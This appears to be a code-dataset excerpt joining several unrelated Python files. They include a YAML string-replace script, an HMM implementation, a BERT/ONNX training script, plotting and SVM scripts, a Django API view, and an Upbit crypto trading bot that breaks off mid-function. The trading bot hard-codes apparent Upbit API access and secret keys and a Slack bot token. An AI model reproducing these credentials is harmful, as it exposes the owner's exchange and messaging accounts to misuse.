time\n\nfilename=['enable_custom_list_machine.yml','disable_custom_list_machine.yml']\n\n### Backup \nfor i1 in range(len(filename)):\n f1=open(filename[i1],'r')\n m=f1.read()\n f_back=open(filename[i1]+time.strftime(\"_%Y\"),'w')\n for i2 in m:\n f_back.write(i2)\n \n n=len(m)\n for i4 in range(n): \n#Next statement checks 11 characters as we are searching for string 'are'\n if m[i4:i4+11]=='text_change':\n m_new=m.replace('text_change',sys.argv[1])\n d2=open(filename[i1],'w')\n for i5 in m_new:\n d2.write(i5)\n\n\n\n\n","sub_path":"zango/Notif_Auto2/replace_string.py","file_name":"replace_string.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"309272409","text":"import numpy as np\nimport numpy.random as npr\n\nfrom scipy.special import logsumexp\n\nfrom sds_numpy.initial import CategoricalInitState\nfrom sds_numpy.transitions import StationaryTransition\nfrom sds_numpy.observations import GaussianObservation\n\nfrom sds_numpy.utils import ensure_args_are_viable_lists\nfrom sds_numpy.cython.hmm_cy import forward_cy, backward_cy\n\nfrom tqdm import trange\n\nto_c = lambda arr: np.copy(arr, 'C')\\\n if not 
arr.flags['C_CONTIGUOUS'] else arr\n\n\nclass HMM:\n\n def __init__(self, nb_states, dm_obs, dm_act=0,\n init_state_prior={}, trans_prior={}, obs_prior={},\n init_state_kwargs={}, trans_kwargs={}, obs_kwargs={}):\n\n self.nb_states = nb_states\n self.dm_obs = dm_obs\n self.dm_act = dm_act\n\n self.init_state = CategoricalInitState(self.nb_states, prior=init_state_prior, **init_state_kwargs)\n self.transitions = StationaryTransition(self.nb_states, prior=trans_prior, **trans_kwargs)\n self.observations = GaussianObservation(self.nb_states, self.dm_obs, self.dm_act,\n prior=obs_prior, **obs_kwargs)\n\n @property\n def params(self):\n return self.init_state.params, \\\n self.transitions.params, \\\n self.observations.params\n\n @params.setter\n def params(self, value):\n self.init_state.params = value[0]\n self.transitions.params = value[1]\n self.observations.params = value[2]\n\n @ensure_args_are_viable_lists\n def initialize(self, obs, act=None, **kwargs):\n self.init_state.initialize()\n if hasattr(self, 'init_observation'):\n self.init_observation.initialize(obs)\n self.transitions.initialize(obs, act)\n self.observations.initialize(obs, act)\n\n def permute(self, perm):\n self.init_state.permute(perm)\n self.transitions.permute(perm)\n self.observations.permute(perm)\n\n def log_priors(self):\n logprior = 0.0\n logprior += self.init_state.log_prior()\n logprior += self.transitions.log_prior()\n logprior += self.observations.log_prior()\n return logprior\n\n @ensure_args_are_viable_lists\n def log_likelihoods(self, obs, act=None):\n loginit = self.init_state.log_init()\n logtrans = self.transitions.log_transition(obs, act)\n logobs = self.observations.log_likelihood(obs, act)\n return loginit, logtrans, logobs\n\n def log_norm(self, obs, act=None):\n loglikhds = self.log_likelihoods(obs, act)\n _, norm = self.forward(*loglikhds)\n return np.sum(np.hstack(norm))\n\n def log_probability(self, obs, act=None):\n return self.log_norm(obs, act) + self.log_priors()\n\n def forward(self, loginit, logtrans, logobs, logctl=None, cython=True):\n if logctl is None:\n logctl = []\n for _logobs in logobs:\n logctl.append(np.zeros((_logobs.shape[0], self.nb_states)))\n\n alpha, norm = [], []\n for _logobs, _logctl, _logtrans in zip(logobs, logctl, logtrans):\n T = _logobs.shape[0]\n _alpha = np.zeros((T, self.nb_states))\n _norm = np.zeros((T, ))\n\n if cython:\n forward_cy(to_c(loginit), to_c(_logtrans),\n to_c(_logobs), to_c(_logctl),\n to_c(_alpha), to_c(_norm))\n else:\n for k in range(self.nb_states):\n _alpha[0, k] = loginit[k] + _logobs[0, k]\n _norm[0] = logsumexp(_alpha[0], axis=-1, keepdims=True)\n _alpha[0] = _alpha[0] - _norm[0]\n\n _aux = np.zeros((self.nb_states,))\n for t in range(1, T):\n for k in range(self.nb_states):\n for j in range(self.nb_states):\n _aux[j] = _alpha[t - 1, j] + _logtrans[t - 1, j, k]\n _alpha[t, k] = logsumexp(_aux) + _logobs[t, k] + _logctl[t, k]\n\n _norm[t] = logsumexp(_alpha[t], axis=-1, keepdims=True)\n _alpha[t] = _alpha[t] - _norm[t]\n\n alpha.append(_alpha)\n norm.append(_norm)\n return alpha, norm\n\n def backward(self, loginit, logtrans, logobs,\n logctl=None, scale=None, cython=True):\n if logctl is None:\n logctl = []\n for _logobs in logobs:\n logctl.append(np.zeros((_logobs.shape[0], self.nb_states)))\n\n beta = []\n for _logobs, _logctl, _logtrans, _scale in zip(logobs, logctl, logtrans, scale):\n T = _logobs.shape[0]\n _beta = np.zeros((T, self.nb_states))\n\n if cython:\n backward_cy(to_c(loginit), to_c(_logtrans),\n to_c(_logobs), 
to_c(_logctl),\n to_c(_beta), to_c(_scale))\n else:\n for k in range(self.nb_states):\n _beta[T - 1, k] = 0.0 - _scale[T - 1]\n\n _aux = np.zeros((self.nb_states,))\n for t in range(T - 2, -1, -1):\n for k in range(self.nb_states):\n for j in range(self.nb_states):\n _aux[j] = _logtrans[t, k, j] + _beta[t + 1, j]\\\n + _logobs[t + 1, j] + _logctl[t + 1, j]\n _beta[t, k] = logsumexp(_aux) - _scale[t]\n\n beta.append(_beta)\n return beta\n\n def posterior(self, alpha, beta):\n return [np.exp(_alpha + _beta - logsumexp(_alpha + _beta, axis=1, keepdims=True))\n for _alpha, _beta in zip(alpha, beta)]\n\n def joint_posterior(self, alpha, beta, loginit, logtrans, logobs, logctl=None):\n if logctl is None:\n logctl = []\n for _logobs in logobs:\n logctl.append(np.zeros((_logobs.shape[0], self.nb_states)))\n\n zeta = []\n for _logobs, _logctl, _logtrans, _alpha, _beta in\\\n zip(logobs, logctl, logtrans, alpha, beta):\n _zeta = _alpha[:-1, :, None] + _beta[1:, None, :] + _logtrans\\\n + _logobs[1:, :][:, None, :] + _logctl[1:, :][:, None, :]\n\n _zeta -= _zeta.max((1, 2))[:, None, None]\n _zeta = np.exp(_zeta)\n _zeta /= _zeta.sum((1, 2))[:, None, None]\n\n zeta.append(_zeta)\n return zeta\n\n @ensure_args_are_viable_lists\n def viterbi(self, obs, act=None):\n loginit, logtrans, logobs = self.log_likelihoods(obs, act)[0:3]\n\n delta = []\n z = []\n for _logobs, _logtrans in zip(logobs, logtrans):\n T = _logobs.shape[0]\n\n _delta = np.zeros((T, self.nb_states))\n _args = np.zeros((T, self.nb_states), np.int64)\n _z = np.zeros((T, ), np.int64)\n\n for t in range(T - 2, -1, -1):\n _aux = _logtrans[t, :] + _delta[t + 1, :] + _logobs[t + 1, :]\n _delta[t, :] = np.max(_aux, axis=1)\n _args[t + 1, :] = np.argmax(_aux, axis=1)\n\n _z[0] = np.argmax(loginit + _delta[0, :] + _logobs[0, :], axis=0)\n for t in range(1, T):\n _z[t] = _args[t, _z[t - 1]]\n\n delta.append(_delta)\n z.append(_z)\n\n return delta, z\n\n def estep(self, obs, act=None):\n loglikhds = self.log_likelihoods(obs, act)\n alpha, norm = self.forward(*loglikhds)\n beta = self.backward(*loglikhds, scale=norm)\n gamma = self.posterior(alpha, beta)\n zeta = self.joint_posterior(alpha, beta, *loglikhds)\n\n return gamma, zeta\n\n def mstep(self, gamma, zeta,\n obs, act,\n init_mstep_kwargs,\n trans_mstep_kwargs,\n obs_mstep_kwargs, **kwargs):\n\n if hasattr(self, 'init_observation'):\n self.init_observation.mstep(gamma, obs)\n\n self.init_state.mstep(gamma, **init_mstep_kwargs)\n self.transitions.mstep(zeta, obs, act, **trans_mstep_kwargs)\n self.observations.mstep(gamma, obs, act, **obs_mstep_kwargs)\n\n @ensure_args_are_viable_lists\n def em(self, train_obs, train_act=None, nb_iter=50, prec=1e-4,\n init_mstep_kwargs={}, trans_mstep_kwargs={},\n obs_mstep_kwargs={}, **kwargs):\n\n process_id = kwargs.get('process_id', 0)\n\n train_lls = []\n train_ll = self.log_norm(train_obs, train_act)\n train_lls.append(train_ll)\n last_train_ll = train_ll\n\n pbar = trange(nb_iter, position=process_id)\n pbar.set_description(\"#{}, ll: {:.5f}\".format(process_id, train_lls[-1]))\n\n for _ in pbar:\n gamma, zeta = self.estep(train_obs, train_act)\n self.mstep(gamma, zeta, train_obs, train_act,\n init_mstep_kwargs,\n trans_mstep_kwargs,\n obs_mstep_kwargs,\n **kwargs)\n\n train_ll = self.log_norm(train_obs, train_act)\n train_lls.append(train_ll)\n\n pbar.set_description(\"#{}, ll: {:.5f}\".format(process_id, train_lls[-1]))\n\n if abs(train_ll - last_train_ll) < prec:\n break\n else:\n last_train_ll = train_ll\n\n return train_lls\n\n 
@ensure_args_are_viable_lists\n def earlystop_em(self, train_obs, train_act=None, nb_iter=50, prec=1e-4,\n init_mstep_kwargs={}, trans_mstep_kwargs={}, obs_mstep_kwargs={},\n test_obs=None, test_act=None, **kwargs):\n\n assert test_obs is not None and test_act is not None\n\n process_id = kwargs.get('process_id', 0)\n\n nb_train = np.vstack(train_obs).shape[0]\n nb_test = np.vstack(test_obs).shape[0]\n nb_all = nb_train + nb_test\n\n train_lls = []\n train_ll = self.log_norm(train_obs, train_act)\n train_lls.append(train_ll)\n last_train_ll = train_ll\n\n test_lls = []\n test_ll = self.log_norm(test_obs, test_act)\n test_lls.append(test_ll)\n last_test_ll = test_ll\n\n all_ll = last_train_ll + last_test_ll\n\n score = (all_ll - train_ll) / (nb_all - nb_train)\n last_score = score\n\n pbar = trange(nb_iter, position=process_id)\n pbar.set_description(\"#{}, train_ll: {:.5f}, test_ll: {:.5f},\"\n \" score: {:.5f}\".format(process_id, train_ll, test_ll, score))\n\n for _ in pbar:\n gamma, zeta = self.estep(train_obs, train_act)\n self.mstep(gamma, zeta, train_obs, train_act,\n init_mstep_kwargs,\n trans_mstep_kwargs,\n obs_mstep_kwargs,\n **kwargs)\n\n train_ll = self.log_norm(train_obs, train_act)\n train_lls.append(train_ll)\n\n test_ll = self.log_norm(test_obs, test_act)\n test_lls.append(test_ll)\n\n all_ll = train_ll + test_ll\n score = (all_ll - train_ll) / (nb_all - nb_train)\n\n pbar.set_description(\"#{}, train_ll: {:.5f}, test_ll: {:.5f},\"\n \"score: {:.5f}\".format(process_id, train_ll, test_ll, score))\n\n if abs(score - last_score) < prec:\n break\n else:\n last_score = score\n\n return train_lls\n\n @ensure_args_are_viable_lists\n def mean_observation(self, obs, act=None):\n loglikhds = self.log_likelihoods(obs, act)\n alpha, norm = self.forward(*loglikhds)\n beta = self.backward(*loglikhds, scale=norm)\n gamma = self.posterior(alpha, beta)\n\n mean_obs = self.observations.smooth(gamma, obs, act)\n return mean_obs\n\n @ensure_args_are_viable_lists\n def filter(self, obs, act=None):\n logliklhds = self.log_likelihoods(obs, act)\n alpha, _ = self.forward(*logliklhds)\n belief = [np.exp(_alpha - logsumexp(_alpha, axis=1, keepdims=True))\n for _alpha in alpha]\n return belief\n\n def sample(self, act=None, horizon=None):\n state = []\n obs = []\n\n for n in range(len(horizon)):\n _act = np.zeros((horizon[n], self.dm_act)) if act is None else act[n]\n _obs = np.zeros((horizon[n], self.dm_obs))\n _state = np.zeros((horizon[n],), np.int64)\n\n _state[0] = self.init_state.sample()\n _obs[0, :] = self.observations.sample(_state[0])\n for t in range(1, horizon[n]):\n _state[t] = self.transitions.sample(_state[t - 1], _obs[t - 1, :], _act[t - 1, :])\n _obs[t, :] = self.observations.sample(_state[t], _obs[t - 1, :], _act[t - 1, :])\n\n state.append(_state)\n obs.append(_obs)\n\n return state, obs\n\n def step(self, obs, act, belief, stoch=True, average=False):\n if stoch:\n # it doesn't make sense to average while sampling\n assert not average\n\n if stoch:\n state = npr.choice(self.nb_states, p=belief)\n nxt_state = self.transitions.sample(state, obs, act)\n nxt_obs = self.observations.sample(nxt_state, obs, act)\n else:\n if average:\n nxt_state = None\n\n # average over transitions and belief space\n _logtrans = np.squeeze(self.transitions.log_transition(obs, act)[0])\n _trans = np.exp(_logtrans - logsumexp(_logtrans, axis=1, keepdims=True))\n\n _zeta = _trans.T @ belief\n _nxt_belief = _zeta / _zeta.sum()\n\n nxt_obs = np.zeros((1, self.dm_obs))\n for k in range(self.nb_states):\n 
nxt_obs += _nxt_belief[k] * self.observations.mean(k, obs, act)\n else:\n state = np.argmax(belief)\n nxt_state = self.transitions.likeliest(state, obs, act)\n nxt_obs = self.observations.mean(nxt_state, obs, act)\n\n return nxt_state, nxt_obs\n\n def forcast(self, hist_obs=None, hist_act=None, nxt_act=None,\n horizon=None, stoch=False, average=False):\n\n nxt_state = []\n nxt_obs = []\n\n for n in range(len(horizon)):\n _hist_obs = hist_obs[n]\n _hist_act = hist_act[n]\n\n _nxt_act = np.zeros((horizon[n], self.dm_act)) if nxt_act is None else nxt_act[n]\n _nxt_obs = np.zeros((horizon[n] + 1, self.dm_obs))\n _nxt_state = np.zeros((horizon[n] + 1,), np.int64)\n\n _belief = self.filter(_hist_obs, _hist_act)[0][-1, ...]\n\n if stoch:\n _nxt_state[0] = npr.choice(self.nb_states, p=_belief)\n _nxt_obs[0, :] = _hist_obs[-1, ...]\n for t in range(horizon[n]):\n _nxt_state[t + 1] = self.transitions.sample(_nxt_state[t], _nxt_obs[t, :], _nxt_act[t, :])\n _nxt_obs[t + 1, :] = self.observations.sample(_nxt_state[t + 1], _nxt_obs[t, :], _nxt_act[t, :])\n else:\n if average:\n # return empty discrete state when mixing\n _nxt_state = None\n\n _nxt_obs[0, :] = _hist_obs[-1, ...]\n for t in range(horizon[n]):\n\n # average over transitions and belief space\n _logtrans = np.squeeze(self.transitions.log_transition(_nxt_obs[t, :], _nxt_act[t, :])[0])\n _trans = np.exp(_logtrans - logsumexp(_logtrans, axis=1, keepdims=True))\n\n # update belief\n _zeta = _trans.T @ _belief\n _belief = _zeta / _zeta.sum()\n\n # average observations\n for k in range(self.nb_states):\n _nxt_obs[t + 1, :] += _belief[k] * self.observations.mean(k, _nxt_obs[t, :], _nxt_act[t, :])\n else:\n _nxt_state[0] = np.argmax(_belief)\n _nxt_obs[0, :] = _hist_obs[-1, ...]\n for t in range(horizon[n]):\n _nxt_state[t + 1] = self.transitions.likeliest(_nxt_state[t], _nxt_obs[t, :], _nxt_act[t, :])\n _nxt_obs[t + 1, :] = self.observations.mean(_nxt_state[t + 1], _nxt_obs[t, :], _nxt_act[t, :])\n\n nxt_state.append(_nxt_state)\n nxt_obs.append(_nxt_obs)\n\n return nxt_state, nxt_obs\n\n @ensure_args_are_viable_lists\n def kstep_mse(self, obs, act, horizon=1, stoch=False, average=False):\n\n from sklearn.metrics import mean_squared_error,\\\n explained_variance_score, r2_score\n\n mse, smse, evar = [], [], []\n for _obs, _act in zip(obs, act):\n _hist_obs, _hist_act, _nxt_act = [], [], []\n _target, _prediction = [], []\n\n _nb_steps = _obs.shape[0] - horizon\n for t in range(_nb_steps):\n _hist_obs.append(_obs[:t + 1, :])\n _hist_act.append(_act[:t + 1, :])\n _nxt_act.append(_act[t: t + horizon, :])\n\n _hr = [horizon for _ in range(_nb_steps)]\n _, _forcast = self.forcast(hist_obs=_hist_obs, hist_act=_hist_act,\n nxt_act=_nxt_act, horizon=_hr, stoch=stoch,\n average=average)\n\n for t in range(_nb_steps):\n _target.append(_obs[t + horizon, :])\n _prediction.append(_forcast[t][-1, :])\n\n _target = np.vstack(_target)\n _prediction = np.vstack(_prediction)\n\n _mse = mean_squared_error(_target, _prediction)\n _smse = 1. 
- r2_score(_target, _prediction, multioutput='variance_weighted')\n _evar = explained_variance_score(_target, _prediction, multioutput='variance_weighted')\n\n mse.append(_mse)\n smse.append(_smse)\n evar.append(_evar)\n\n return np.mean(mse), np.mean(smse), np.mean(evar)\n","sub_path":"sds_numpy/hmm.py","file_name":"hmm.py","file_ext":"py","file_size_in_byte":17930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"226295170","text":"# -------------------------------------------------------------------------\n# Portions Copyright (c) Microsoft Corporation. All rights reserved.\n# --------------------------------------------------------------------------\n# Copyright 2020 The HuggingFace Inc. team. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport numpy as np\nimport mlflow\nimport time\nfrom typing import Dict, Callable\nimport json\nimport os\n\n# from dataclasses import dataclass, field\nimport transformers\nfrom transformers import (\n AutoModelForSequenceClassification,\n AutoTokenizer,\n EvalPrediction,\n Trainer,\n HfArgumentParser,\n TrainingArguments,\n)\nfrom glue_datasets import (\n load_encoded_glue_dataset,\n num_labels_from_task,\n load_metric_from_task,\n)\n\n# pretraining\nfrom transformers import AutoConfig\nfrom transformers import DataCollatorForLanguageModeling\n\n# Azure ML imports - could replace this with e.g. 
wandb or mlflow\nfrom transformers.integrations import MLflowCallback\n\n# Pytorch Profiler\nimport torch.profiler.profiler as profiler\nfrom transformers import TrainerCallback\n\n# Onnx Runtime for training\nfrom optimum.onnxruntime import ORTTrainer, ORTTrainingArguments\n\n\ndef construct_compute_metrics_function(task: str) -> Callable[[EvalPrediction], Dict]:\n metric = load_metric_from_task(task)\n\n if task != \"stsb\":\n\n def compute_metrics_function(eval_pred: EvalPrediction) -> Dict:\n predictions, labels = eval_pred\n predictions = np.argmax(predictions, axis=1)\n return metric.compute(predictions=predictions, references=labels)\n\n else:\n\n def compute_metrics_function(eval_pred: EvalPrediction) -> Dict:\n predictions, labels = eval_pred\n predictions = predictions[:, 0]\n return metric.compute(predictions=predictions, references=labels)\n\n return compute_metrics_function\n\n\nif __name__ == \"__main__\":\n parser = HfArgumentParser(ORTTrainingArguments)\n parser.add_argument(\"--task\", default=\"cola\", help=\"name of GLUE task to compute\")\n parser.add_argument(\"--model_checkpoint\", default=\"bert-large-uncased\")\n parser.add_argument(\"--tensorboard_log_dir\", default=\"/outputs/runs/\")\n\n training_args, args = parser.parse_args_into_dataclasses()\n\n transformers.logging.set_verbosity_debug()\n\n task: str = args.task.lower()\n\n num_labels = num_labels_from_task(task)\n\n tokenizer = AutoTokenizer.from_pretrained(args.model_checkpoint, use_fast=True)\n context_length = 512\n\n model_config = AutoConfig.from_pretrained(\n args.model_checkpoint,\n vocab_size=len(tokenizer),\n n_ctx=context_length,\n bos_token_id=tokenizer.bos_token_id,\n eos_token_id=tokenizer.eos_token_id,\n )\n model = AutoModelForSequenceClassification.from_config(model_config)\n\n encoded_dataset_train, encoded_dataset_eval = load_encoded_glue_dataset(\n task=task, tokenizer=tokenizer\n )\n\n compute_metrics = construct_compute_metrics_function(args.task)\n\n # Create path for logging to tensorboard\n my_logs = os.environ[\"PWD\"] + args.tensorboard_log_dir\n\n # Custom HuggingFace trainer callback used for starting/stopping the pytorch profiler\n class ProfilerCallback(TrainerCallback):\n def on_train_begin(self, args, state, control, model=None, **kwargs):\n self.prof = profiler.profile(\n schedule=profiler.schedule(wait=2, warmup=1, active=3, repeat=2),\n activities=[\n profiler.ProfilerActivity.CPU,\n profiler.ProfilerActivity.CUDA,\n ],\n on_trace_ready=profiler.tensorboard_trace_handler(my_logs),\n record_shapes=True,\n with_stack=True,\n profile_memory=True,\n )\n self.prof.start()\n\n def on_train_end(self, args, state, control, model=None, **kwargs):\n self.prof.stop()\n\n def on_step_begin(self, args, state, control, model=None, **kwargs):\n self.prof.step()\n\n # Initialize huggingface trainer. 
This trainer will internally execute the training loop\n trainer = ORTTrainer(\n model=model,\n args=training_args,\n train_dataset=encoded_dataset_train,\n eval_dataset=encoded_dataset_eval,\n # data_collator=data_collator,\n tokenizer=tokenizer,\n compute_metrics=compute_metrics,\n callbacks=[ProfilerCallback],\n feature=\"sequence-classification\",\n )\n\n trainer.pop_callback(MLflowCallback)\n\n start = time.time()\n\n # pretrian the model!\n result = trainer.train()\n\n print(f\"Time: {result.metrics['train_runtime']:.2f}\")\n print(f\"Samples/second: {result.metrics['train_samples_per_second']:.2f}\")\n print(\"Training...\")\n\n mlflow.log_metric(\n \"time/epoch\", (time.time() - start) / 60 / training_args.num_train_epochs\n )\n\n print(\"Evaluation...\")\n\n trainer.evaluate()\n","sub_path":"best-practices/largescale-deep-learning/Training/Bert-Pretrain/src/pretrain_glue_ORT.py","file_name":"pretrain_glue_ORT.py","file_ext":"py","file_size_in_byte":5462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"203237477","text":"# this script is used to plot the spectrum of omega(ky) & gamma(ky) for a given rho\n# Read some input parameter\niplotErr=root['SETTINGS']['PLOTS']['iplotErr']\nif root['INPUTS']['GYROInput']['input.gyro'].has_key('L_Y'):\n L_Y=root['INPUTS']['GYROInput']['input.gyro']['L_Y'] # the reference ky\nelse:\n L_Y=0.3\nif root['INPUTS']['GYROInput']['input.gyro'].has_key('TOROIDAL_GRID'):\n TOROIDAL_GRID=root['INPUTS']['GYROInput']['input.gyro']['TOROIDAL_GRID'] # the reference ky\nelse:\n TOROIDAL_GRID=1\nif root['INPUTS']['GYROInput']['input.gyro'].has_key('TOROIDAL_MIN'):\n TOROIDAL_MIN=root['INPUTS']['GYROInput']['input.gyro']['TOROIDAL_MIN'] # the reference ky\nelse:\n TOROIDAL_MIN=30\nif root['INPUTS']['GYROInput']['input.gyro'].has_key('TOROIDAL_SEP'):\n TOROIDAL_SEP=root['INPUTS']['GYROInput']['input.gyro']['TOROIDAL_SEP'] # the reference ky\nelse:\n TOROIDAL_SEP=10\n\nk=root['SETTINGS']['PLOTS']['ipltspectrum']\n#wr=ones(TOROIDAL_GRID)\n#wr_err=ones(TOROIDAL_GRID)\n#wi=ones(TOROIDAL_GRID)\n#wi_err=ones(TOROIDAL_GRID)\n#for k in linspace(0,TOROIDAL_GRID-1,TOROIDAL_GRID):\nwr=root['OUTPUTSRec']['GYROOutput'][k]['wr']\nwi=root['OUTPUTSRec']['GYROOutput'][k]['wi']\nwr_err=root['OUTPUTSRec']['GYROOutput'][k]['wr_err']\nwi_err=root['OUTPUTSRec']['GYROOutput'][k]['wi_err']\n# calculate ky\nky=L_Y/TOROIDAL_MIN*(TOROIDAL_MIN+linspace(0,TOROIDAL_GRID-1,TOROIDAL_GRID)*TOROIDAL_SEP)\n#rho=root['INPUTS']['GYROInput']['input.gyro']['RADIUS']\np_tgyro=root['SETTINGS']['PLOTS']['p_tgyro']\nrho_max=root['INPUTS']['TGYROInput']['input.tgyro']['TGYRO_RMAX']\nrho_all=linspace(0,rho_max,p_tgyro+1)\nrho=rho_all[k]\nfigure(5)\nfsize=24\nsubplot(1,2,1)\n#plot(ky,wr,'-bo',linewidth=2,label='rho='+str(rho)+' $\\omega$')\nplot(ky,wr,'-bo',linewidth=2,label='$\\omega$')\nif iplotErr==1:\n plot(ky,wr_err,'-ro',linewidth=2,label='$Error$')\n legend(loc=0).draggable(True)\nxlabel('$k_y$',fontsize=fsize,family='serif')\nylabel('$\\omega$',fontsize=fsize,family='serif')\nxticks(fontsize=16,family='serif')\nyticks(fontsize=16,family='serif')\ntitle('rho='+str(rho))\nsubplot(1,2,2)\nplot(ky,wi,'-b*',linewidth=2,label='$\\gamma$')\nif iplotErr==1:\n plot(ky,wi_err,'-r*',linewidth=2,label='$Error$')\n 
legend(loc=0).draggable(True)\nxticks(fontsize=16,family='serif')\nyticks(fontsize=16,family='serif')\nxlabel('$k_y$',fontsize=fsize,family='serif')\nylabel('$\\gamma$',fontsize=fsize,family='serif')\ntitle('rho='+str(rho))\n","sub_path":"MyInte/SCRIPTS/GYRO/plotspectrum.py","file_name":"plotspectrum.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"401683634","text":"import pandas as pd\nimport numpy as np\nimport preprocessing as pre\nfrom sklearn.svm import LinearSVC\nimport time\nimport evaluatemodel as evm\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import GridSearchCV\n\nparam = {'C': [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0],\n 'class_weight': [None, 'balanced'],\n 'fit_intercept': [False, True],\n 'intercept_scaling': [0, 0.5, 1],\n 'loss': ['hinge', 'squared_hinge'],\n 'max_iter': [10000,11500, 12000, 13500, 15000],\n 'multi_class': ['ovr', 'crammer_singer'],\n 'penalty': ['l1','l2'],\n 'tol': [0.0001, 0.0005, 0.001, 0.005],\n 'verbose': [1, 2, 4, 5, 10, 20]\n }\n\n##Funções de GridSearchCV\ndef config_param(clf, param, cv = 5, n_jobs = 1, scoring = 'balanced_accuracy'):\n grid_class = GridSearchCV(clf, param, cv = cv, n_jobs = n_jobs, scoring = scoring)\n return clf, grid_class\n\ndef get_param(clf, param, X, y):\n clf, grid_class = config_param(clf, param)\n return grid_class.fit(X,y)\n\ndef best_model(clf, X, Y):\n all_param = get_param(clf, param, X, Y)\n best_result = all_param.best_estimator_\n return best_result\n\n## Aplicação das funções de gridsearch para os melhores parâmetros da máquina de vetor suporte\ndef SVMClass():\n print(\"-------------------\")\n print(\"Support Vector Machine\")\n print(\"Início do CVGrid\")\n inicio = time.time()\n clf = LinearSVC()\n XaTrain, XaTest, yaTrain, yaTest = pre.Data()\n svm_class = best_model(clf, XaTrain, yaTrain)\n clf = svm_class.fit(XaTrain, yaTrain)\n yPred = clf.predict(XaTest)\n final = time.time() - inicio\n min = final/60\n print(\"Melhores parâmetros: \")\n print(svm_class)\n print('Tempo de Execução: {} min '.format(min))\n print('Final do CVGrid')\n print(\"-------------------\")\n return XaTrain, XaTest, yaTrain, yaTest, yPred, clf\n\ndef SVMMetrics():\n print(\"-------------------\")\n print(\"Métricas Support Vector Machine\")\n XaTrain, XaTest, yaTrain, yaTest, yPred, clf = SVMClass()\n inicio = time.time()\n evm.CrossValidation(clf, XaTest, yPred)\n final = time.time() - inicio\n min = final/60\n print('Tempo de Execução: {} min '.format(min))\n print('Final das Métricas')\n print(\"-------------------\")\n\ndef PlotSVM():\n XaTrain, XaTest, yaTrain, yaTest, yPred, clf = SVMClass()\n XaTest = pd.DataFrame(XaTest)\n yPred = pd.DataFrame(yPred)\n df = pd.concat([XaTest, yaTest], axis = 1)\n df.insert(27, 'Predições', yPred.values, allow_duplicates = False)\n sns.relplot(data=df, x=\"Banda 1\", y='Nuvem Alta', hue = 'Predições')\n plt.show()\n","sub_path":"GridTotalCloud/svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"484846531","text":"# coding=utf-8\nimport json\nfrom django.http.response import HttpResponse\nfrom django.db.models import CharField, Value as V\nfrom django.db.models.functions import Concat\nfrom rest_framework.views import APIView\nfrom bims.models.biological_collection_record import BiologicalCollectionRecord\nfrom 
sass.models import SiteVisit\n\n\nclass CollectorList(APIView):\n    \"\"\"API for listing all biological collection record collectors.\"\"\"\n\n    def get(self, request, *args):\n        assessors = (\n            SiteVisit.objects.all().exclude(\n                assessor__isnull=True\n            ).annotate(\n                full_name=Concat(\n                    'assessor__first_name', V(' '), 'assessor__last_name',\n                    output_field=CharField()\n                )\n            ).distinct('full_name').order_by(\n                'full_name'\n            ).values_list('full_name', flat=True)\n        )\n        collectors = (\n            BiologicalCollectionRecord.objects.filter(\n                validated=True).exclude(\n                collector__exact='').values_list(\n                'collector', flat=True).distinct(\n                'collector'\n            ).order_by('collector')\n        )\n        all_users = list(assessors) + list(collectors)\n        all_users = list(set(all_users))\n        all_users.sort()\n        user_index = 0\n        if len(all_users) > 0:\n            while all_users[user_index] == ' ':\n                user_index += 1\n        return HttpResponse(\n            json.dumps(all_users[user_index:]),\n            content_type='application/json'\n        )\n","sub_path":"bims/api_views/collector.py","file_name":"collector.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"200571780","text":"import pyupbit\nimport random\nimport time\nimport requests\n\ndef post_message(token, channel, text):\n    response = requests.post(\"https://slack.com/api/chat.postMessage\",\n        headers={\"Authorization\": \"Bearer \" + token},\n        data={\"channel\": channel, \"text\": text})\n    #print(response)\n\nmyToken = \"xoxb-2214036150211-2213836848130-MGOLLe5LfbVZP5h8buojkHCY\"\npost_message(myToken, \"#stock\", \"Starting automated coin trading\")\n\n#def dbgout(message):\n#    \"\"\"Print the given string to both the Python shell and Slack.\"\"\"\n#    print(datetime.now().strftime('[%m/%d %H:%M:%S]'), message)\n#    strbuf = datetime.now().strftime('[%m/%d %H:%M:%S] ') + message\n#    post_message(myToken,\"#stock\", strbuf)\n\naccess = \"W0pBEN1VwvBvTHtp8zD2hVfgxufsv0PHzrgwCbaS\"\nsecret = \"z0iST1K4uhFwP1QKX8riwXmIPxwRsPu4xnUr9KKw\"\n\ntickers = pyupbit.get_tickers(fiat=\"KRW\") # fetch only the KRW-denominated coins listed on Upbit\nrandom.shuffle(tickers) ## shuffle so the tickers are scanned in random order.\n\n#post_message(myToken, \"#stock\", \"Ticker:\" + str(tickers) + \" buy complete\")\n#post_message(myToken, \"#stock\", \"Ticker:\" + str(tickers) + \" sell complete\")\n\ndef get_target_price(ticker):\n    \"\"\"Previous closing price of the ticker's 5-minute candle\"\"\"\n    Y_lp_ma5 = pyupbit.get_ohlcv(ticker, interval=\"minute5\")\n    Y_lm5_price = Y_lp_ma5['close'].rolling(5).mean()\n    Y_lm5_list = Y_lm5_price.iloc[-2]\n    return Y_lm5_list\n\ndef get_current_price(ticker):\n    \"\"\"Current price of the ticker's 5-minute candle\"\"\"\n    Now_lp_ma5 = 